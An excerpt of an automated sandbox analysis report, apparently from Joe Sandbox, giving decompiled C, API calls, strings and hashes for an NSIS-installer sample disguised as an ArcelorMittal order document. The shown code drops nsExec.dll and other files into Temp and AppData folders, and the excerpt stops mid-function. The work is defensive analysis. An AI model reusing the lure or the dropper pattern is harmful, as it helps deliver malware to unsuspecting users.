                                                				 *0x7a8ac0 =  *0x7a8a58 & 0x00000020;
                                                				 *0x7a8adc = 0x10000;
                                                				if(E00405AEE(_t90, L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis") != 0) {
                                                					L16:
                                                					if(E00405AEE(_t98, _t86) == 0) {
                                                						E00406054(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
                                                					}
                                                					_t30 = LoadImageW( *0x7a8a40, 0x67, 1, 0, 0, 0x8040); // executed
                                                					 *0x7a7a28 = _t30;
                                                					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                						L21:
                                                						if(E0040140B(0) == 0) {
                                                							_t32 = E00403B51(_t78, __eflags);
                                                							__eflags =  *0x7a8ae0;
                                                							if( *0x7a8ae0 != 0) {
                                                								_t33 = E00405264(_t32, 0);
                                                								__eflags = _t33;
                                                								if(_t33 == 0) {
                                                									E0040140B(1);
                                                									goto L33;
                                                								}
                                                								__eflags =  *0x7a7a0c; // 0x0
                                                								if(__eflags == 0) {
                                                									E0040140B(2);
                                                								}
                                                								goto L22;
                                                							}
                                                							ShowWindow( *0x7a1f20, 5); // executed
                                                							_t39 = E0040639C("RichEd20"); // executed
                                                							__eflags = _t39;
                                                							if(_t39 == 0) {
                                                								E0040639C("RichEd32");
                                                							}
                                                							_t87 = L"RichEdit20W";
                                                							_t40 = GetClassInfoW(0, _t87, 0x7a79e0);
                                                							__eflags = _t40;
                                                							if(_t40 == 0) {
                                                								GetClassInfoW(0, L"RichEdit", 0x7a79e0);
                                                								 *0x7a7a04 = _t87;
                                                								RegisterClassW(0x7a79e0);
                                                							}
                                                							_t41 =  *0x7a7a20; // 0x0
                                                							_t44 = DialogBoxParamW( *0x7a8a40, _t41 + 0x00000069 & 0x0000ffff, 0, E00403C1E, 0); // executed
                                                							E004037CB(E0040140B(5), 1);
                                                							return _t44;
                                                						}
                                                						L22:
                                                						_t36 = 2;
                                                						return _t36;
                                                					} else {
                                                						_t78 =  *0x7a8a40;
                                                						 *0x7a79e4 = E00401000;
                                                						 *0x7a79f0 =  *0x7a8a40;
                                                						 *0x7a79f4 = _t30;
                                                						 *0x7a7a04 = 0x40a3a0;
                                                						if(RegisterClassW(0x7a79e0) == 0) {
                                                							L33:
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                						 *0x7a1f20 = CreateWindowExW(0x80, 0x40a3a0, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8a40, 0);
                                                						goto L21;
                                                					}
                                                				} else {
                                                					_t78 =  *(_t82 + 0x48);
                                                					if( *(_t82 + 0x48) == 0) {
                                                						goto L16;
                                                					}
                                                					_t76 = 0x7a69e0;
                                                					E00405EFF( *((intOrPtr*)(_t82 + 0x44)),  *0x7a8a78 + _t78 * 2,  *0x7a8a78 +  *(_t82 + 0x4c) * 2, 0x7a69e0, 0);
                                                					_t63 =  *0x7a69e0; // 0x45
                                                					if(_t63 == 0) {
                                                						goto L16;
                                                					}
                                                					if(_t63 == 0x22) {
                                                						_t76 = 0x7a69e2;
                                                						 *((short*)(E00405A13(0x7a69e2, 0x22))) = 0;
                                                					}
                                                					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                						L15:
                                                						E00406032(_t86, E004059E6(_t76));
                                                						goto L16;
                                                					} else {
                                                						_t69 = GetFileAttributesW(_t76);
                                                						if(_t69 == 0xffffffff) {
                                                							L14:
                                                							E00405A32(_t76);
                                                							goto L15;
                                                						}
                                                						_t98 = _t69 & 0x00000010;
                                                						if((_t69 & 0x00000010) != 0) {
                                                							goto L15;
                                                						}
                                                						goto L14;
                                                					}
                                                				}
                                                			}

                                                APIs
                                                  • Part of subcall function 00406408: GetModuleHandleA.KERNEL32(?,?,00000020,004032E9,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040641A
                                                  • Part of subcall function 00406408: GetProcAddress.KERNEL32(00000000,?), ref: 00406435
                                                • lstrcatW.KERNEL32(1033,007A1F40), ref: 004038FC
                                                • lstrlenW.KERNEL32(ExecToStack,?,?,?,ExecToStack,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis,1033,007A1F40,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F40,00000000,00000002,772EFAA0), ref: 0040397C
                                                • lstrcmpiW.KERNEL32(?,.exe,ExecToStack,?,?,?,ExecToStack,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis,1033,007A1F40,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F40,00000000), ref: 0040398F
                                                • GetFileAttributesW.KERNEL32(ExecToStack), ref: 0040399A
                                                • LoadImageW.USER32 ref: 004039E3
                                                  • Part of subcall function 00405F79: wsprintfW.USER32 ref: 00405F86
                                                • RegisterClassW.USER32 ref: 00403A20
                                                • SystemParametersInfoW.USER32 ref: 00403A38
                                                • CreateWindowExW.USER32 ref: 00403A6D
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403AA3
                                                • GetClassInfoW.USER32 ref: 00403ACF
                                                • GetClassInfoW.USER32 ref: 00403ADC
                                                • RegisterClassW.USER32 ref: 00403AE5
                                                • DialogBoxParamW.USER32 ref: 00403B04
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis$Control Panel\Desktop\ResourceLocale$ExecToStack$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$yz
                                                • API String ID: 1975747703-2536485963
                                                • Opcode ID: d6a2569dce1583fa4271488535ea6afbb2ec52d86251b0d01a743b5b25147845
                                                • Instruction ID: b5c0bd5baa1962433b8b11afb21299241a1e412529c89f65b595a7484f15debb
                                                • Opcode Fuzzy Hash: d6a2569dce1583fa4271488535ea6afbb2ec52d86251b0d01a743b5b25147845
                                                • Instruction Fuzzy Hash: E761A570240600AED620BF669D46F2B3A6CEBC5B45F40857FF941B22E2DB7C9901CB6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph
                                                C-Code - Quality: 80%
                                                			E00402DEE(void* __eflags, signed int _a4) {
                                                				DWORD* _v8;
                                                				DWORD* _v12;
                                                				void* _v16;
                                                				intOrPtr _v20;
                                                				long _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				signed int _v44;
                                                				long _t43;
                                                				signed int _t50;
                                                				void* _t53;
                                                				void* _t57;
                                                				intOrPtr* _t59;
                                                				long _t60;
                                                				signed int _t65;
                                                				signed int _t70;
                                                				signed int _t71;
                                                				signed int _t77;
                                                				intOrPtr _t80;
                                                				long _t82;
                                                				signed int _t85;
                                                				signed int _t87;
                                                				void* _t89;
                                                				signed int _t90;
                                                				signed int _t93;
                                                				void* _t94;
                                                
                                                				_t82 = 0;
                                                				_v12 = 0;
                                                				_v8 = 0;
                                                				_t43 = GetTickCount();
                                                				_t91 = L"C:\\Users\\frontdesk\\Desktop\\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe";
                                                				 *0x7a8a4c = _t43 + 0x3e8;
                                                				GetModuleFileNameW(0, L"C:\\Users\\frontdesk\\Desktop\\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", 0x400);
                                                				_t89 = E00405C07(_t91, 0x80000000, 3);
                                                				_v16 = _t89;
                                                				 *0x40a018 = _t89;
                                                				if(_t89 == 0xffffffff) {
                                                					return L"Error launching installer";
                                                				}
                                                				_t92 = L"C:\\Users\\frontdesk\\Desktop";
                                                				E00406032(L"C:\\Users\\frontdesk\\Desktop", _t91);
                                                				E00406032(L"Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", E00405A32(_t92));
                                                				_t50 = GetFileSize(_t89, 0);
                                                				__eflags = _t50;
                                                				 *0x7976fc = _t50;
                                                				_t93 = _t50;
                                                				if(_t50 <= 0) {
                                                					L24:
                                                					E00402D8A(1);
                                                					__eflags =  *0x7a8a54 - _t82;
                                                					if( *0x7a8a54 == _t82) {
                                                						goto L29;
                                                					}
                                                					__eflags = _v8 - _t82;
                                                					if(_v8 == _t82) {
                                                						L28:
                                                						_t53 = GlobalAlloc(0x40, _v24); // executed
                                                						_t94 = _t53;
                                                						E00403235( *0x7a8a54 + 0x1c);
                                                						_push(_v24);
                                                						_push(_t94);
                                                						_push(_t82);
                                                						_push(0xffffffff);
                                                						_t57 = E00403027();
                                                						__eflags = _t57 - _v24;
                                                						if(_t57 == _v24) {
                                                							__eflags = _v44 & 0x00000001;
                                                							 *0x7a8a50 = _t94;
                                                							 *0x7a8a58 =  *_t94;
                                                							if((_v44 & 0x00000001) != 0) {
                                                								 *0x7a8a5c =  *0x7a8a5c + 1;
                                                								__eflags =  *0x7a8a5c;
                                                							}
                                                							_t40 = _t94 + 0x44; // 0x44
                                                							_t59 = _t40;
                                                							_t85 = 8;
                                                							do {
                                                								_t59 = _t59 - 8;
                                                								 *_t59 =  *_t59 + _t94;
                                                								_t85 = _t85 - 1;
                                                								__eflags = _t85;
                                                							} while (_t85 != 0);
                                                							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                							 *(_t94 + 0x3c) = _t60;
                                                							E00405BC2(0x7a8a60, _t94 + 4, 0x40);
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						goto L29;
                                                					}
                                                					E00403235( *0x78b6f4);
                                                					_t65 = E0040321F( &_a4, 4);
                                                					__eflags = _t65;
                                                					if(_t65 == 0) {
                                                						goto L29;
                                                					}
                                                					__eflags = _v12 - _a4;
                                                					if(_v12 != _a4) {
                                                						goto L29;
                                                					}
                                                					goto L28;
                                                				} else {
                                                					do {
                                                						_t90 = _t93;
                                                						asm("sbb eax, eax");
                                                						_t70 = ( ~( *0x7a8a54) & 0x00007e00) + 0x200;
                                                						__eflags = _t93 - _t70;
                                                						if(_t93 >= _t70) {
                                                							_t90 = _t70;
                                                						}
                                                						_t71 = E0040321F(0x797700, _t90);
                                                						__eflags = _t71;
                                                						if(_t71 == 0) {
                                                							E00402D8A(1);
                                                							L29:
                                                							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                						}
                                                						__eflags =  *0x7a8a54;
                                                						if( *0x7a8a54 != 0) {
                                                							__eflags = _a4 & 0x00000002;
                                                							if((_a4 & 0x00000002) == 0) {
                                                								E00402D8A(0);
                                                							}
                                                							goto L20;
                                                						}
                                                						E00405BC2( &_v44, 0x797700, 0x1c);
                                                						_t77 = _v44;
                                                						__eflags = _t77 & 0xfffffff0;
                                                						if((_t77 & 0xfffffff0) != 0) {
                                                							goto L20;
                                                						}
                                                						__eflags = _v40 - 0xdeadbeef;
                                                						if(_v40 != 0xdeadbeef) {
                                                							goto L20;
                                                						}
                                                						__eflags = _v28 - 0x74736e49;
                                                						if(_v28 != 0x74736e49) {
                                                							goto L20;
                                                						}
                                                						__eflags = _v32 - 0x74666f73;
                                                						if(_v32 != 0x74666f73) {
                                                							goto L20;
                                                						}
                                                						__eflags = _v36 - 0x6c6c754e;
                                                						if(_v36 != 0x6c6c754e) {
                                                							goto L20;
                                                						}
                                                						_a4 = _a4 | _t77;
                                                						_t87 =  *0x78b6f4; // 0x24cc4
                                                						 *0x7a8ae0 =  *0x7a8ae0 | _a4 & 0x00000002;
                                                						_t80 = _v20;
                                                						__eflags = _t80 - _t93;
                                                						 *0x7a8a54 = _t87;
                                                						if(_t80 > _t93) {
                                                							goto L29;
                                                						}
                                                						__eflags = _a4 & 0x00000008;
                                                						if((_a4 & 0x00000008) != 0) {
                                                							L16:
                                                							_v8 = _v8 + 1;
                                                							_t93 = _t80 - 4;
                                                							__eflags = _t90 - _t93;
                                                							if(_t90 > _t93) {
                                                								_t90 = _t93;
                                                							}
                                                							goto L20;
                                                						}
                                                						__eflags = _a4 & 0x00000004;
                                                						if((_a4 & 0x00000004) != 0) {
                                                							break;
                                                						}
                                                						goto L16;
                                                						L20:
                                                						__eflags = _t93 -  *0x7976fc; // 0x253b8
                                                						if(__eflags < 0) {
                                                							_v12 = E004064B9(_v12, 0x797700, _t90);
                                                						}
                                                						 *0x78b6f4 =  *0x78b6f4 + _t90;
                                                						_t93 = _t93 - _t90;
                                                						__eflags = _t93;
                                                					} while (_t93 > 0);
                                                					_t82 = 0;
                                                					__eflags = 0;
                                                					goto L24;
                                                				}
                                                			}
                                                0x00402fc6
                                                0x00402eab
                                                0x00402eb2
                                                0x00402f2e
                                                0x00402f32
                                                0x00402f36
                                                0x00402f3b
                                                0x00000000
                                                0x00402f32
                                                0x00402ebb
                                                0x00402ec0
                                                0x00402ec3
                                                0x00402ec8
                                                0x00000000
                                                0x00000000
                                                0x00402eca
                                                0x00402ed1
                                                0x00000000
                                                0x00000000
                                                0x00402ed3
                                                0x00402eda
                                                0x00000000
                                                0x00000000
                                                0x00402edc
                                                0x00402ee3
                                                0x00000000
                                                0x00000000
                                                0x00402ee5
                                                0x00402eec
                                                0x00000000
                                                0x00000000
                                                0x00402eee
                                                0x00402ef4
                                                0x00402efd
                                                0x00402f03
                                                0x00402f06
                                                0x00402f08
                                                0x00402f0e
                                                0x00000000
                                                0x00000000
                                                0x00402f14
                                                0x00402f18
                                                0x00402f20
                                                0x00402f20
                                                0x00402f23
                                                0x00402f26
                                                0x00402f28
                                                0x00402f2a
                                                0x00402f2a
                                                0x00000000
                                                0x00402f28
                                                0x00402f1a
                                                0x00402f1e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402f3c
                                                0x00402f3c
                                                0x00402f42
                                                0x00402f4e
                                                0x00402f4e
                                                0x00402f51
                                                0x00402f57
                                                0x00402f59
                                                0x00402f59
                                                0x00402f61
                                                0x00402f61
                                                0x00000000
                                                0x00402f61

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00402DFF
                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,00000400,?,?,00000000,00403517,?), ref: 00402E1B
                                                  • Part of subcall function 00405C07: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00405C0B
                                                  • Part of subcall function 00405C07: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403517,?), ref: 00405C2D
                                                • GetFileSize.KERNEL32(00000000,00000000,Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00402E67
                                                Strings
                                                • Inst, xrefs: 00402ED3
                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                • "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", xrefs: 00402DF4
                                                • C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
                                                • Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, xrefs: 00402E5B
                                                • Null, xrefs: 00402EE5
                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402DF5
                                                • C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, xrefs: 00402E05, 00402E14, 00402E28, 00402E48
                                                • Error launching installer, xrefs: 00402E3E
                                                • soft, xrefs: 00402EDC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                • String ID: "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe$soft
                                                • API String ID: 4283519449-3514231688
                                                • Opcode ID: 2249d346c310f13e90e060258289ef97018bdecfafda78b47c803c2d5af002aa
                                                • Instruction ID: ab97cff943281949067decbc104515b53a1facb94f92f7dd678b53d189ae88d2
                                                • Opcode Fuzzy Hash: 2249d346c310f13e90e060258289ef97018bdecfafda78b47c803c2d5af002aa
                                                • Instruction Fuzzy Hash: 6351F671940206ABCB109F65DE49B9E7BB8FB15394F20813BF904B62C1D7BC9D809B5D
                                                Uniqueness
                                                • Uniqueness Score: -1.00%

                                                Control-flow Graph
                                                [rendered control-flow graph for E00401767 not reproduced in text]
                                                C-Code - Quality: 61%
                                                			E00401767(FILETIME* __ebx, void* __eflags) {
                                                				void* __edi;
                                                				void* _t35;
                                                				void* _t43;
                                                				void* _t45;
                                                				FILETIME* _t51;
                                                				FILETIME* _t64;
                                                				void* _t66;
                                                				signed int _t72;
                                                				FILETIME* _t73;
                                                				FILETIME* _t77;
                                                				signed int _t79;
                                                				void* _t81;
                                                				void* _t82;
                                                				WCHAR* _t84;
                                                				void* _t86;
                                                
                                                				_t77 = __ebx;
                                                				 *(_t86 - 0xc) = E00402BBF(0x31);
                                                				 *(_t86 + 8) =  *(_t86 - 0x2c) & 0x00000007;
                                                				_t35 = E00405A5D( *(_t86 - 0xc));
                                                				_push( *(_t86 - 0xc));
                                                				_t84 = L"ExecToStack";
                                                				if(_t35 == 0) {
                                                					lstrcatW(E004059E6(E00406032(_t84, L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis\\Grusendes\\Stoser\\Unappealingness\\Dermobranchiate")), ??);
                                                				} else {
                                                					E00406032();
                                                				}
                                                				E004062C6(_t84);
                                                				while(1) {
                                                					__eflags =  *(_t86 + 8) - 3;
                                                					if( *(_t86 + 8) >= 3) {
                                                						_t66 = E00406375(_t84);
                                                						_t79 = 0;
                                                						__eflags = _t66 - _t77;
                                                						if(_t66 != _t77) {
                                                							_t73 = _t66 + 0x14;
                                                							__eflags = _t73;
                                                							_t79 = CompareFileTime(_t73, _t86 - 0x20);
                                                						}
                                                						asm("sbb eax, eax");
                                                						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                						__eflags = _t72;
                                                						 *(_t86 + 8) = _t72;
                                                					}
                                                					__eflags =  *(_t86 + 8) - _t77;
                                                					if( *(_t86 + 8) == _t77) {
                                                						E00405BE2(_t84);
                                                					}
                                                					__eflags =  *(_t86 + 8) - 1;
                                                					_t43 = E00405C07(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                					__eflags = _t43 - 0xffffffff;
                                                					 *(_t86 - 8) = _t43;
                                                					if(_t43 != 0xffffffff) {
                                                						break;
                                                					}
                                                					__eflags =  *(_t86 + 8) - _t77;
                                                					if( *(_t86 + 8) != _t77) {
                                                						E00405191(0xffffffe2,  *(_t86 - 0xc));
                                                						__eflags =  *(_t86 + 8) - 2;
                                                						if(__eflags == 0) {
                                                							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                						}
                                                						L31:
                                                						 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t86 - 4));
                                                						__eflags =  *0x7a8ac8;
                                                						goto L32;
                                                					} else {
                                                						E00406032("C:\Users\FRONTD~1\AppData\Local\Temp\nsq5B3B.tmp", _t81);
                                                						E00406032(_t81, _t84);
                                                						E00406054(_t77, _t81, _t84, "C:\Users\FRONTD~1\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll",  *((intOrPtr*)(_t86 - 0x18)));
                                                						E00406032(_t81, "C:\Users\FRONTD~1\AppData\Local\Temp\nsq5B3B.tmp");
                                                						_t64 = E00405777("C:\Users\FRONTD~1\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll",  *(_t86 - 0x2c) >> 3) - 4;
                                                						__eflags = _t64;
                                                						if(_t64 == 0) {
                                                							continue;
                                                						} else {
                                                							__eflags = _t64 == 1;
                                                							if(_t64 == 1) {
                                                								 *0x7a8ac8 =  &( *0x7a8ac8->dwLowDateTime);
                                                								L32:
                                                								_t51 = 0;
                                                								__eflags = 0;
                                                							} else {
                                                								_push(_t84);
                                                								_push(0xfffffffa);
                                                								E00405191();
                                                								L29:
                                                								_t51 = 0x7fffffff;
                                                							}
                                                						}
                                                					}
                                                					L33:
                                                					return _t51;
                                                				}
                                                				E00405191(0xffffffea,  *(_t86 - 0xc));
                                                				 *0x7a8af4 =  *0x7a8af4 + 1;
                                                				_push(_t77);
                                                				_push(_t77);
                                                				_push( *(_t86 - 8));
                                                				_push( *((intOrPtr*)(_t86 - 0x24)));
                                                				_t45 = E00403027(); // executed
                                                				 *0x7a8af4 =  *0x7a8af4 - 1;
                                                				__eflags =  *(_t86 - 0x20) - 0xffffffff;
                                                				_t82 = _t45;
                                                				if( *(_t86 - 0x20) != 0xffffffff) {
                                                					L22:
                                                					SetFileTime( *(_t86 - 8), _t86 - 0x20, _t77, _t86 - 0x20); // executed
                                                				} else {
                                                					__eflags =  *((intOrPtr*)(_t86 - 0x1c)) - 0xffffffff;
                                                					if( *((intOrPtr*)(_t86 - 0x1c)) != 0xffffffff) {
                                                						goto L22;
                                                					}
                                                				}
                                                				CloseHandle( *(_t86 - 8));
                                                				__eflags = _t82 - _t77;
                                                				if(_t82 >= _t77) {
                                                					goto L31;
                                                				} else {
                                                					__eflags = _t82 - 0xfffffffe;
                                                					if(_t82 != 0xfffffffe) {
                                                						E00406054(_t77, _t82, _t84, _t84, 0xffffffee);
                                                					} else {
                                                						E00406054(_t77, _t82, _t84, _t84, 0xffffffe9);
                                                						lstrcatW(_t84,  *(_t86 - 0xc));
                                                					}
                                                					_push(0x200010);
                                                					_push(_t84);
                                                					E00405777();
                                                					goto L29;
                                                				}
                                                				goto L33;
                                                			}


                                                APIs
                                                • lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
                                                • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate,?,?,00000031), ref: 004017CD
                                                  • Part of subcall function 00406032: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,0040332D,Overcaustically Setup,NSIS Error), ref: 0040603F
                                                  • Part of subcall function 00405191: lstrlenW.KERNEL32(007A0F20,00000000,007924F8,772EEA30,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C9
                                                  • Part of subcall function 00405191: lstrlenW.KERNEL32(00403168,007A0F20,00000000,007924F8,772EEA30,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D9
                                                  • Part of subcall function 00405191: lstrcatW.KERNEL32(007A0F20,00403168), ref: 004051EC
                                                  • Part of subcall function 00405191: SetWindowTextW.USER32(007A0F20,007A0F20), ref: 004051FE
                                                  • Part of subcall function 00405191: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405224
                                                  • Part of subcall function 00405191: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523E
                                                  • Part of subcall function 00405191: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp$C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate$ExecToStack
                                                • API String ID: 1941528284-3720196480
                                                • Opcode ID: f68a6b2c34e2433bc227599e278aafb616f0a180d0c639fbdfc3b46ee5da03b6
                                                • Instruction ID: 9699be85dc7bc18e029f6e3bff89e0f5bb762e6a6aa9adbfdaf5ed0cd7dffae0
                                                • Opcode Fuzzy Hash: f68a6b2c34e2433bc227599e278aafb616f0a180d0c639fbdfc3b46ee5da03b6
                                                • Instruction Fuzzy Hash: A341D571940515BBCF10BBB5CC46DAF3679EF06369B20823BF122B10E1DB3C8A519A6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 938 4025e5-4025fa call 402ba2 941 402600-402607 938->941 942 402a4c-402a4f 938->942 944 402609 941->944 945 40260c-40260f 941->945 943 402a55-402a5b 942->943 944->945 946 402773-40277b 945->946 947 402615-402624 call 405f92 945->947 946->942 947->946 951 40262a 947->951 952 402630-402634 951->952 953 4026c9-4026cc 952->953 954 40263a-402655 ReadFile 952->954 956 4026e4-4026f4 call 405c8a 953->956 957 4026ce-4026d1 953->957 954->946 955 40265b-402660 954->955 955->946 960 402666-402674 955->960 956->946 966 4026f6 956->966 957->956 958 4026d3-4026de call 405ce8 957->958 958->946 958->956 963 40267a-40268c MultiByteToWideChar 960->963 964 40272f-40273b call 405f79 960->964 963->966 967 40268e-402691 963->967 964->943 969 4026f9-4026fc 966->969 970 402693-40269e 967->970 969->964 972 4026fe-402703 969->972 970->969 973 4026a0-4026c5 SetFilePointer MultiByteToWideChar 970->973 974 402740-402744 972->974 975 402705-40270a 972->975 973->970 976 4026c7 973->976 977 402761-40276d SetFilePointer 974->977 978 402746-40274a 974->978 975->974 979 40270c-40271f 975->979 976->966 977->946 980 402752-40275f 978->980 981 40274c-402750 978->981 979->946 982 402721-402727 979->982 980->946 981->977 981->980 982->952 983 40272d 982->983 983->946
                                                C-Code - Quality: 83%
                                                			E004025E5(intOrPtr __ebx, void* __esi) {
                                                				intOrPtr _t64;
                                                				intOrPtr _t65;
                                                				void* _t73;
                                                				void* _t76;
                                                
                                                				 *((intOrPtr*)(_t73 - 0xc)) = __ebx;
                                                				_t64 = 2;
                                                				 *((intOrPtr*)(_t73 - 0x3c)) = _t64;
                                                				_t65 = E00402BA2(_t64);
                                                				_t76 = _t65 - 1;
                                                				 *((intOrPtr*)(_t73 - 0x48)) = _t65;
                                                				if(_t76 < 0) {
                                                					L36:
                                                					 *0x7a8ac8 =  *0x7a8ac8 +  *(_t73 - 4);
                                                				} else {
                                                					__ecx = 0x3ff;
                                                					if(__eax > 0x3ff) {
                                                						 *(__ebp - 0x48) = 0x3ff;
                                                					}
                                                					if( *__esi == __bx) {
                                                						L34:
                                                						__ecx =  *(__ebp - 0x10);
                                                						__eax =  *(__ebp - 0xc);
                                                						 *( *(__ebp - 0x10) +  *(__ebp - 0xc) * 2) = __bx;
                                                						if(_t76 == 0) {
                                                							 *(_t73 - 4) = 1;
                                                						}
                                                						goto L36;
